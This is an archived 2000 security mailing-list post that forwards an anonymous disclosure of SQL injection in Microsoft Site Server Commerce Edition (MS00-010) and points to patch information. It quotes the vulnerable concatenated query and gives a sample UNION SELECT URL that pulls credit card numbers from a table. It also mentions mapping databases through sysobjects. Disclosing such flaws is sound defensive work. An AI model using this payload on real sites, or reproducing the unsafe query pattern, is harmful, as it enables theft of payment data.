mailing list archives
BID 994, MS00-010 (Site Server Commerce Edition non-validated SQL inputs)
From: bgreenbaum () SECURITYFOCUS COM (Ben Greenbaum)
Date: Fri, 25 Feb 2000 09:11:17 -0800
Forwarded to the list from a contributor who wishes to remain anonymous:
-----Begin Forwarded Message-----
The link from one page to another is
Within product.asp dept_id is picked up and used to construct a SQL
"select a,b,c,d,e,f,g from table where dept_id = " & Request("Dept_ID")
Further down the page a, b, c, d, e, f and g are response.writed to the
Think about what happens if the URL above is modified to
http://hostname/product.asp?dept_id=100000 union select
credit_card_number,null,null,null,null,null, null from Credit_Card_table
If a bogus dept_id is used the second unioned statement returns a result
set in its place and gets displayed on the page!!
I know this is possible on a number of large commercial sites.
The interesting fact is that this is just within a dogey piece of code
produced by site server. The same technique is viable for any database
acessing asp that uses parameters from either get or post.
No special tools are needed, this can be done by direct typing in the
The implications like being able to loop through the sysobjects table to
get a complete table structure of a database,etc are frightening.
-----End Forwarded Message-----
This is a known issue with several web applications that use an SQL
database. More information on this particular case, including patch
locations, is available at:
Director of Site Content